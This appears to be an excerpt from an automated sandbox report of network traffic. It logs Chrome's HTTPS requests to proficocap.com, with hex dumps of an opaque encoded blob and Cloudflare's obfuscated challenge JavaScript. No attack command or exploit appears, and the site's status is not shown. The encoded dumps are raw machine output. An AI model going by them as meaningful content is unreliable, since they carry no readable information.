                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 31 4f 76 51 72 4d 54 59 4d 50 44 59 64 51 54 6b 34 4f 30 45 41 33 76 58 32 39 2f 6a 35 2b 76 76 38 2f 66 34 41 41 53 38 77 4d 46 49 36 48 69 49 4a 59 56 52 61 55 56 31 6d 48 6c 42 56 57 56 4e 59 58 6d 4e 58 61 47 70 76 4b 6d 42 6d 61 30 46 78 61 31 56 6e 57 7a 49 52 4b 43 6b 71 4b 79 77 74 4c 69 38 77 4d 54 49 7a 65 48 70 62 58 30 78 54 4f 70 4b 46 69 34 4b 4f 6c 30 2b 42 68 6f 71 45 69 59 2b 55 69 4a 6d 62 6f 46 75 53 6c 48 56 35 5a 6c 38 2b 56 56 5a 58 57 46 6c 61 57 31 78 64 58 6c 39 67 6d 4a 75 55 71 4b 74 38 67 57 6a 41 73 37 6d 77 76 4d 56 39 72 37 53 34 73 72 65 39 77 72 62 48 79 63 36 4a 73 37 61 76 77 38 61 58 6a 6d 32 45 68 59 61 48 69 49 6d 4b 69 34 79 4e 6a 6f 2b 78 32 2b 75 32 74 71 57 77 6c 2b 2f 69 36 4e 2f 72 39 4b 7a 65 34 2b 66 68 35 75
                                                                          Data Ascii: 1OvQrMTYMPDYdQTk4O0EA3vX29/j5+vv8/f4AAS8wMFI6HiIJYVRaUV1mHlBVWVNYXmNXaGpvKmBma0Fxa1VnWzIRKCkqKywtLi8wMTIzeHpbX0xTOpKFi4KOl0+BhoqEiY+UiJmboFuSlHV5Zl8+VVZXWFlaW1xdXl9gmJuUqKt8gWjAs7mwvMV9r7S4sre9wrbHyc6Js7avw8aXjm2EhYaHiImKi4yNjo+x2+u2tqWwl+/i6N/r9Kze4+fh5u
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 36 2b 7a 74 37 6b 59 79 52 50 4a 47 4f 6b 72 32 46 66 67 42 41 68 66 6d 2f 66 34 41 41 51 49 44 42 41 55 47 42 77 67 4a 59 45 78 65 44 56 6c 55 61 54 31 58 59 52 51 79 46 6d 4a 64 63 69 68 6e 59 57 74 6c 63 32 67 38 49 67 30 6b 4a 53 59 6e 4b 43 6b 71 4b 79 77 74 4c 69 2b 47 63 6f 51 7a 64 59 65 49 59 33 32 48 4f 6c 67 38 66 70 43 52 54 6f 32 48 6b 59 75 5a 6a 6d 4a 49 4d 30 70 4c 54 45 31 4f 54 31 42 52 55 6c 4e 55 56 5a 79 6d 71 6c 6c 69 73 5a 32 76 58 71 69 6b 75 57 4b 41 5a 48 57 42 5a 37 47 74 77 6d 75 49 62 61 2f 42 77 70 32 33 77 59 39 31 76 37 76 51 68 49 57 45 66 4e 68 6f 66 34 43 42 67 6f 4f 45 68 59 61 48 69 49 6d 4b 69 34 79 4e 6a 75 48 56 35 5a 4b 65 73 5a 58 63 36 65 66 6d 76 65 50 64 37 38 48 75 35 4f 62 46 35 4f 66 74 36 2b 4b 77 36 76 7a
                                                                          Data Ascii: 6+zt7kYyRPJGOkr2FfgBAhfm/f4AAQIDBAUGBwgJYExeDVlUaT1XYRQyFmJdcihnYWtlc2g8Ig0kJSYnKCkqKywtLi+GcoQzdYeIY32HOlg8fpCRTo2HkYuZjmJIM0pLTE1OT1BRUlNUVZymqllisZ2vXqikuWKAZHWBZ7GtwmuIba/Bwp23wY91v7vQhIWEfNhof4CBgoOEhYaHiImKi4yNjuHV5ZKesZXc6efmvePd78Hu5ObF5Oft6+Kw6vz
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 45 49 6a 4e 30 41 38 4f 30 30 47 2b 6a 39 46 51 56 4e 59 44 51 49 4b 57 56 63 54 54 30 6c 58 54 6c 64 52 58 78 55 59 4b 2f 6f 53 45 78 51 56 46 68 63 59 47 52 6f 62 48 42 30 65 48 79 41 68 66 79 38 6b 4e 6a 59 77 51 78 4d 71 4b 79 77 74 4c 69 38 77 4d 54 49 7a 4e 44 56 2f 66 55 43 51 67 34 6d 41 6a 4a 56 4e 6c 6d 61 57 69 46 68 54 6b 4a 46 77 66 48 6c 62 56 46 53 64 6e 36 43 67 70 4b 65 70 6f 35 2b 71 72 4b 4b 64 61 4a 2b 73 72 4c 4f 70 72 37 65 6b 75 4b 36 31 74 57 39 79 63 32 76 48 56 32 35 76 63 48 46 79 63 33 52 31 64 6e 64 34 65 58 70 37 66 48 33 56 79 4d 37 46 30 64 71 53 32 4d 76 62 76 4e 4c 58 30 4e 76 69 34 70 66 57 35 75 44 57 36 4e 37 6c 35 61 43 69 6d 76 61 47 6e 5a 36 66 6f 4b 47 69 6f 36 53 6c 70 71 65 6f 71 61 71 72 72 4b 32 75 72 37 41 4a
                                                                          Data Ascii: EIjN0A8O00G+j9FQVNYDQIKWVcTT0lXTldRXxUYK/oSExQVFhcYGRobHB0eHyAhfy8kNjYwQxMqKywtLi8wMTIzNDV/fUCQg4mAjJVNlmaWiFhTkJFwfHlbVFSdn6CgpKepo5+qrKKdaJ+srLOpr7ekuK61tW9yc2vHV25vcHFyc3R1dnd4eXp7fH3VyM7F0dqS2MvbvNLX0Nvi4pfW5uDW6N7l5aCimvaGnZ6foKGio6SlpqeoqaqrrK2ur7AJ
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 68 56 35 50 76 38 2f 66 34 41 41 51 49 44 42 41 55 47 42 77 67 4a 43 67 73 4d 44 51 34 50 5a 31 70 67 56 32 4e 73 4a 46 39 74 4f 32 38 7a 4a 43 59 35 43 53 41 68 49 69 4d 6b 4a 53 59 6e 4b 43 6b 71 4b 79 77 74 4c 69 2b 4e 50 54 4a 45 52 45 56 47 51 46 4d 6a 4f 6a 73 38 50 54 34 2f 51 45 46 43 51 30 52 46 6f 34 79 55 6e 49 2b 6d 4e 6b 31 4f 54 31 42 52 55 6c 4e 55 56 56 5a 58 57 46 6c 61 57 31 79 67 70 71 4b 30 75 5a 31 71 75 61 36 39 6e 58 70 77 70 32 75 4a 62 59 4b 4b 57 6e 46 79 63 33 52 31 64 6e 64 34 65 58 70 37 66 48 31 2b 66 34 44 45 79 73 62 59 33 63 47 4f 33 37 44 63 78 5a 36 55 79 35 65 5a 65 35 4b 54 6c 4a 57 57 6c 35 69 5a 6d 70 75 63 6e 66 75 4a 6f 4b 47 69 6f 36 53 6c 70 71 63 47 71 65 2f 33 41 50 4b 75 43 35 71 78 73 72 4f 30 74 62 61 33 75
                                                                          Data Ascii: hV5Pv8/f4AAQIDBAUGBwgJCgsMDQ4PZ1pgV2NsJF9tO28zJCY5CSAhIiMkJSYnKCkqKywtLi+NPTJEREVGQFMjOjs8PT4/QEFCQ0RFo4yUnI+mNk1OT1BRUlNUVVZXWFlaW1ygpqK0uZ1qua69nXpwp2uJbYKKWnFyc3R1dnd4eXp7fH1+f4DEysbY3cGO37DcxZ6Uy5eZe5KTlJWWl5iZmpucnfuJoKGio6SlpqcGqe/3APKuC5qxsrO0tba3u
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 41 41 51 49 44 51 30 68 4d 52 6b 74 52 56 6b 70 50 59 57 59 64 4f 54 4a 72 4e 30 6f 6c 46 6a 51 59 56 46 63 32 42 68 30 65 48 79 42 67 5a 57 6c 6a 61 47 35 7a 5a 32 78 2b 67 7a 71 44 56 58 64 34 61 6b 4d 7a 55 54 55 34 67 56 46 73 6a 34 56 78 62 6f 74 70 6a 6d 69 62 61 58 47 66 65 59 39 38 66 4b 4a 6a 63 4a 4a 76 68 58 6d 57 72 4a 31 32 71 5a 32 4d 68 61 61 4f 66 6f 4f 57 74 33 4e 79 6c 6d 52 2b 54 6d 56 6d 5a 32 69 6f 72 62 47 72 73 4c 61 37 72 37 54 47 79 34 4b 39 78 62 2b 63 6a 33 71 59 66 48 2b 4f 67 5a 74 72 67 6f 4f 45 68 63 58 4b 7a 73 6a 4e 30 39 6a 4d 30 65 50 6f 6e 37 6e 4b 74 75 48 70 71 4a 69 32 6d 70 33 64 33 50 48 55 37 37 48 45 76 50 48 53 2b 4f 62 38 31 64 69 74 78 35 65 75 72 37 43 78 38 66 62 36 39 50 6b 41 42 66 6a 39 45 42 58 4c 46 67
                                                                          Data Ascii: AAQIDQ0hMRktRVkpPYWYdOTJrN0olFjQYVFc2Bh0eHyBgZWljaG5zZ2x+gzqDVXd4akMzUTU4gVFsj4VxbotpjmibaXGfeY98fKJjcJJvhXmWrJ12qZ2MhaaOfoOWt3NylmR+TmVmZ2iorbGrsLa7r7TGy4K9xb+cj3qYfH+OgZtrgoOEhcXKzsjN09jM0ePon7nKtuHpqJi2mp3d3PHU77HEvPHS+Ob81ditx5eur7Cx8fb69PkABfj9EBXLFg
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 58 52 6b 61 4b 79 31 63 50 45 52 52 49 32 55 30 56 69 51 32 4b 79 30 39 54 54 31 6a 59 7a 56 6e 51 30 56 57 4f 57 68 77 65 54 70 66 58 59 4e 38 64 6e 41 2b 65 6e 39 68 53 6c 65 4e 66 45 32 4e 55 48 74 51 68 46 78 44 53 54 35 2b 67 34 65 42 68 6f 79 52 68 59 71 63 6f 56 4e 6d 4e 6b 31 4f 54 31 43 75 50 46 4e 55 56 56 61 70 6e 61 32 76 72 61 70 34 53 4b 4b 68 74 4b 64 71 71 5a 43 4c 73 4b 2b 77 67 33 4b 47 56 32 35 76 63 48 46 36 75 63 6e 44 75 63 76 42 79 4d 69 44 68 58 33 5a 61 57 70 72 67 6f 4f 45 68 59 61 48 69 49 6e 67 7a 4e 36 4e 30 64 66 63 31 4f 62 72 6c 4c 4b 57 31 74 76 66 32 64 37 6b 36 64 33 69 39 50 6e 64 34 75 66 72 35 65 72 77 39 65 6e 75 41 51 61 38 31 74 73 46 2f 67 44 46 38 74 47 68 75 4c 6d 36 75 37 79 39 76 72 38 58 41 78 58 44 35 51 73
                                                                          Data Ascii: XRkaKy1cPERRI2U0ViQ2Ky09TT1jYzVnQ0VWOWhweTpfXYN8dnA+en9hSleNfE2NUHtQhFxDST5+g4eBhoyRhYqcoVNmNk1OT1CuPFNUVVapna2vrap4SKKhtKdqqZCLsK+wg3KGV25vcHF6ucnDucvByMiDhX3ZaWprgoOEhYaHiIngzN6N0dfc1ObrlLKW1tvf2d7k6d3i9Pnd4ufr5erw9enuAQa81tsF/gDF8tGhuLm6u7y9vr8XAxXD5Qs
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 78 78 48 5a 47 67 35 52 6b 6f 6a 52 79 67 6f 4b 31 42 52 59 6d 46 64 52 7a 42 7a 4e 31 78 30 61 54 70 77 66 32 42 54 65 6e 64 64 64 6e 64 35 58 33 56 63 64 58 68 4f 64 6c 39 4a 67 34 65 50 59 33 46 50 65 5a 56 34 68 6f 36 54 58 48 57 66 69 35 2b 6b 64 32 52 69 6f 33 69 59 68 6d 57 6a 66 35 2b 72 6b 61 52 75 67 34 4b 49 6c 62 43 4d 65 71 56 32 6d 62 2b 66 6c 37 71 76 6b 35 43 6d 6b 37 53 35 79 61 4b 6f 67 36 6d 47 78 4d 32 6c 78 4d 79 75 6a 71 4f 6a 70 63 58 4e 6f 38 65 57 30 36 33 41 6e 75 4f 63 35 4d 37 55 34 4f 6a 67 78 4d 71 6f 33 73 62 66 71 4e 48 4a 7a 4f 76 6b 7a 66 58 71 35 73 6d 37 73 66 72 76 30 4e 6a 62 33 2b 51 46 7a 67 66 44 76 65 48 70 36 63 72 6c 79 73 6e 4d 44 4f 51 51 35 75 67 51 34 2b 73 52 47 4e 59 4c 2b 78 77 65 2b 64 62 31 4a 41 49 63
                                                                          Data Ascii: xxHZGg5RkojRygoK1BRYmFdRzBzN1x0aTpwf2BTendddnd5X3VcdXhOdl9Jg4ePY3FPeZV4ho6TXHWfi5+kd2Rio3iYhmWjf5+rkaRug4KIlbCMeqV2mb+fl7qvk5Cmk7S5yaKog6mGxM2lxMyujqOjpcXNo8eW063AnuOc5M7U4OjgxMqo3sbfqNHJzOvkzfXq5sm7sfrv0Njb3+QFzgfDveHp6crlysnMDOQQ5ugQ4+sRGNYL+xwe+db1JAIc


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.449763172.67.215.2084431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:34 UTC413OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8eef48dc28b04405 HTTP/1.1
                                                                          Host: proficocap.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:35 UTC871INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:35 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 102658
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JG1sWf%2FqNRyurR3hYkM7zlxzIyVMWZAiflSTg1PcHU3LhQqpXUEZYTt%2FkjIRbmx1pUksLs%2BDd4G1lICEUYG8Q59ZTANBJaUnY9LmnxBjsOlOPeEivCYVV1se0iM2M0EcdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef49053f760fa5-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1477&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=991&delivery_rate=1893644&cwnd=190&unsent_bytes=0&cid=e17b43581f831dc6&ts=448&x=0"
                                                                          2024-12-08 19:50:35 UTC498INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 53 52 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 78 45 4a 58 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 7d
                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uaSR=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"}
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 22 2c 22 72 65 64 69 72 65 63 74 69 6e 67 5f 74 65 78 74 5f 6f 76 65 72 72 75 6e 22 3a 22 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 25 32 30 74 6f 25 32 30 72 65 70 6c 79 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22
                                                                          Data Ascii: ","redirecting_text_overrun":"%25%7Bplaceholder.com%7D%20is%20taking%20longer%20than%20expected%20to%20reply.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists."
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 69 6e 2e 25 32 30 49 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 25 32 30 61 74 74 65 6d 70 74 25 32 30 61 25 32 30 64 69 66 66 65 72 65 6e 74 25 32 30 6c 69 6e 6b 25 32 30 74 6f 25 32 30 67 65 74 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 64 65 73 69 72 65 64 25 32 30 70 61 67 65 2e 25 32 30 41 6c 74 65 72 6e 61 74 69 76 65 6c 79 25 32 43 25 32 30 74 72 79 25 32 30 67 6f 69 6e 67 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 72 6f 6f 74 25 32 30 6f 66 25 32 30 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 2e 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78
                                                                          Data Ascii: in.%20If%20the%20issue%20persists%20attempt%20a%20different%20link%20to%20get%20to%20the%20desired%20page.%20Alternatively%2C%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","check_delays":"Verification%20is%20taking%20longer%20than%20ex
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 32 25 32 30 68 72 65 66 25 33 44 25 32 37 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 25 32 37 25 33 45 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 75 6e 73 75 70 70 6f 72 74 65 64 25 33 43 25 32 46 61 25 33 45 25 32 30 61 6e 64 25 32 30 75 6e 61 62 6c 65 25 32 30 74 6f 25 32 30 63 6f 6d 70 6c 65 74 65 25 32 30 76 65 72 69 66 69 63 61 74 69 6f 6e 2e 25 32 30 54 72 79 25 32 30 61 25 32 30 64 69 66 66 65 72 65 6e 74 25 32 30 62 72 6f 77 73 65 72 25 32 30 6f 72 25 32 30 6d 61 6b 65 25 32 30 73 75 72 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 75 70 64 61 74 65 64 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 6e 65 77 65 73 74 25 32 30 76 65 72 73 69 6f 6e 2e 22 2c 22 62 72 6f 77 73 65 72
                                                                          Data Ascii: 2%20href%3D%27challenge.supported_browsers%27%3Ebrowser%20is%20unsupported%3C%2Fa%3E%20and%20unable%20to%20complete%20verification.%20Try%20a%20different%20browser%20or%20make%20sure%20your%20browser%20is%20updated%20to%20the%20newest%20version.","browser
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 63 63 65 73 73 66 75 6c 22 7d 2c 22 70 6f 6c 79 66 69 6c 6c 73 22 3a 7b 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 66 61 6c 73 65 7d 2c 22 72 74 6c 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 75 73 22 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 67 46 2c 65 4d 2c 65 4e 2c 65 51 2c 65 52 2c 66
                                                                          Data Ascii: ccessful"},"polyfills":{"turnstile_timeout":false,"feedback_report_output_subtitle":false,"turnstile_overrun_description":false,"turnstile_feedback_description":false,"testing_only_always_pass":false},"rtl":false,"lang":"en-us"};~function(gF,eM,eN,eQ,eR,f
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 5b 68 63 28 37 34 35 29 5d 28 76 6f 69 64 20 30 2c 68 29 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 6f 5b 68 63 28 34 34 39 29 5d 28 66 6c 2c 68 29 2c 67 5b 68 63 28 31 31 37 38 29 5d 5b 68 63 28 37 37 31 29 5d 26 26 28 78 3d 78 5b 68 63 28 39 36 32 29 5d 28 67 5b 68 63 28 31 31 37 38 29 5d 5b 68 63 28 37 37 31 29 5d 28 68 29 29 29 2c 78 3d 67 5b 68 63 28 34 32 38 29 5d 5b 68 63 28 39 35 38 29 5d 26 26 67 5b 68 63 28 35 30 30 29 5d 3f 67 5b 68 63 28 34 32 38 29 5d 5b 68 63 28 39 35 38 29 5d 28 6e 65 77 20 67 5b 28 68 63 28 35 30 30 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 65 2c 48 29 7b 66 6f 72 28 68 65 3d 68 63 2c 47 5b 68 65 28 35 37 32 29 5d 28 29 2c 48 3d 30 3b 6f 5b 68 65 28 31 31 36 38 29 5d 28 48 2c 47 5b 68 65 28 31 37 37
                                                                          Data Ascii: [hc(745)](void 0,h))return j;for(x=o[hc(449)](fl,h),g[hc(1178)][hc(771)]&&(x=x[hc(962)](g[hc(1178)][hc(771)](h))),x=g[hc(428)][hc(958)]&&g[hc(500)]?g[hc(428)][hc(958)](new g[(hc(500))](x)):function(G,he,H){for(he=hc,G[he(572)](),H=0;o[he(1168)](H,G[he(177
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 5b 68 67 28 38 39 39 29 5d 28 27 6f 2e 27 2c 6e 29 7d 29 7d 2c 65 4d 5b 67 46 28 31 31 34 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 68 71 2c 65 29 7b 65 3d 28 68 71 3d 67 46 2c 7b 27 65 70 62 4b 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 66 71 28 63 29 7d 63 61 74 63 68 28 67 29 7b 72 65 74 75 72 6e 20 66 6f 28 65 5b 68 71 28 38 35 36 29 5d 28 66 70 2c 63 29 29 7d 7d 2c 66 78 3d 30 2c 65 4d 5b 67 46 28 39 34 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 42 2c 63 29 7b 68 42 3d 67 46 2c 63 3d 7b 27 58 78 67 49 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 72 65 74 75 72 6e 20 64 28 65 29 7d 7d 2c 63 5b 68 42 28 34 34 33 29 5d 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 2c
                                                                          Data Ascii: [hg(899)]('o.',n)})},eM[gF(1144)]=function(c,hq,e){e=(hq=gF,{'epbKm':function(g,h){return g(h)}});try{return fq(c)}catch(g){return fo(e[hq(856)](fp,c))}},fx=0,eM[gF(942)]=function(hB,c){hB=gF,c={'XxgIZ':function(d,e){return d(e)}},c[hB(443)](clearTimeout,
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 63 42 6d 43 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 64 68 73 66 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 7a 57 6a 62 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 78 52 73 65 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 79 6b 73 55 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 55 41 47 4f 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 68 57 28 39 38 35 29 5d 2c 66 3d 7b 27 68 27
                                                                          Data Ascii: on(h,i){return h(i)},'cBmCx':function(h,i){return h!=i},'dhsfi':function(h,i){return h(i)},'zWjbz':function(h,i){return h(i)},'xRsex':function(h,i){return h(i)},'yksUW':function(h,i){return h==i},'UAGOH':function(h,i){return i*h}},e=String[hW(985)],f={'h'
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 5b 68 59 28 34 38 30 29 5d 28 27 27 2c 43 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 68 59 28 38 32 30 29 5d 5b 68 59 28 36 37 31 29 5d 5b 68 59 28 36 31 39 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 68 59 28 33 36 37 29 5d 28 32 35 36 2c 43 5b 68 59 28 35 31 33 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 68 59 28 37 39 38 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 64 5b 68 59 28 37 33 35 29 5d 28 49 2c 64 5b 68 59 28 39 37 32 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 68 59 28 31 30 38 34 29 5d 28 64 5b 68 59 28 31 31 30 34 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 59 28 35 31 33 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 68 59 28 31 32 36 39 29 5d 28 38 2c 73 29 3b 48 3d 31 26 4d 7c 48 3c 3c 31 2c
                                                                          Data Ascii: [hY(480)]('',C)){if(Object[hY(820)][hY(671)][hY(619)](B,C)){if(d[hY(367)](256,C[hY(513)](0))){for(s=0;d[hY(798)](s,F);H<<=1,d[hY(735)](I,d[hY(972)](j,1))?(I=0,G[hY(1084)](d[hY(1104)](o,H)),H=0):I++,s++);for(M=C[hY(513)](0),s=0;d[hY(1269)](8,s);H=1&M|H<<1,
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 27 3a 4a 7c 3d 64 5b 69 31 28 31 31 30 32 29 5d 28 64 5b 69 31 28 39 39 36 29 5d 28 30 2c 4e 29 3f 31 3a 30 2c 46 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 31 28 32 37 35 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 47 26 48 2c 48 3e 3e 3d 31 2c 64 5b 69 31 28 35 35 36 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 69 31 28 39 36 37 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 31 28 31 31 30 32 29 5d 28 30 3c 4e 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4f 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 31 28 32 37 35 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 69
                                                                          Data Ascii: ':J|=d[i1(1102)](d[i1(996)](0,N)?1:0,F);continue}break}switch(J){case 0:for(J=0,K=Math[i1(275)](2,8),F=1;K!=F;N=G&H,H>>=1,d[i1(556)](0,H)&&(H=j,G=d[i1(967)](o,I++)),J|=d[i1(1102)](0<N?1:0,F),F<<=1);O=e(J);break;case 1:for(J=0,K=Math[i1(275)](2,16),F=1;d[i


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.449762104.21.53.1714431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:34 UTC856OUTGET /favicon.ico HTTP/1.1
                                                                          Host: proficocap.com
                                                                          Connection: keep-alive
